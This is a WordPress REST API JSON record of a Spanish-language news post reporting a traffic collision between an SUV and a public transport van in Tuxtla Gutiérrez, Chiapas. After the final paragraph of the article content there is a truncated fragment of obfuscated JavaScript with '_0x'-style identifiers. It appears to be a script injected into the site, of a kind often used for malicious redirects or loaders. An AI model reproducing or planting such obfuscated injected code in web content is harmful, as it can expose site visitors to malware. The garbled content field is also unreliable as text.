{"id":9232,"date":"2023-03-29T01:50:39","date_gmt":"2023-03-29T01:50:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9232"},"modified":"2023-03-29T01:50:40","modified_gmt":"2023-03-29T01:50:40","slug":"fuerte-choque-en-el-retiro-salda-con-danos-materiales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9232","title":{"rendered":"Fuerte choque en El Retiro salda con da\u00f1os materiales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"461\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1680051839163.jpg\" alt=\"\" class=\"wp-image-9233\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1680051839163.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1680051839163-300x192.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 28 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Un choque ocurrido este martes en la Colonia El Retiro, dej\u00f3 cuantiosos da\u00f1os materiales.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando, una camioneta tipo SUV Nissan y una unidad de transporte p\u00fablico que cubre la ruta Tuxtla-San Crist\u00f3bal colisionaron a la altura de la Avenida Brasil y Calle Venezuela.<\/p>\n\n\n\n<p>En el lugar se di\u00f3 a conocer que, fue la unidad particular la que, circulaba de Norte a Sur y se pas\u00f3 la preferencia.<\/p>\n\n\n\n<p>El conductor de la Toyota Hiace rumbo al Oriente cuando se atraves\u00f3 la unidad y la impact\u00f3.<\/p>\n\n\n\n<p>En el lugar los implicados llegaron a un acuerdo para el desistimiento para evitar problemas legales.<\/p>\n\n\n\n<p>Las unidades fueron trasladadas a un taller para su reparaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 28 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Un choque ocurrido este martes en la Colonia El Retiro, dej\u00f3 cuantiosos da\u00f1os materiales. Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando, una camioneta tipo SUV Nissan y una unidad de transporte p\u00fablico que cubre la ruta Tuxtla-San Crist\u00f3bal colisionaron a la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9233,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9232","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9232","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9232"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9232\/revisions"}],"predecessor-version":[{"id":9234,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9232\/revisions\/9234"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9233"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9232"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}